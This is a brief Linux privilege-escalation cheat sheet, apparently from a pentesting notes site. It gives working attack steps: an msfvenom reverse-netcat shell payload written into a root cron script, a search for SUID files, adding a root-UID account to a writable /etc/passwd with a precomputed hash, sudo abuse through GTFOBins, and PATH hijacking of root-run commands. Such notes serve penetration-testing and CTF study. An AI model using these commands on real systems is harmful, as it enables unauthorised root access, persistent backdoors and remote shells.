Linux

Resources

Exploiting crontab

cat /etc/crontab

We can create an msf venom exploit :

msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R

Then we put it into the right directory which is the target of the cron job : echo [MSFVENOM OUTPUT] > autoscript.sh

Exploiting SUID/GUID files

find / -perm -u=s -type f 2>/dev/null

Exploiting writeable /etc/passwd

First create a compliant password hash using :

openssl passwd -1 -salt [salt] [password]

With the use of new as salt and 123 as password we got this : $1$new$p7ptkEKU1HnaHpRtzNizS1

We can add the user at the end of the passwd file by following this (don't forget to escape $ in the password hash): username:passwordhash:0:0:root:/root:/bin/bash

Exploiting sudo

sudo -l then check GTFOBins

Exploiting PATH variables

echo $PATH

If there is a script executed by root which use the ls command for example, we can write an imitation executable and add it to the PATH environmental variable.

To reset the PATH variable, remove the tmp path.

Last updated

Was this helpful?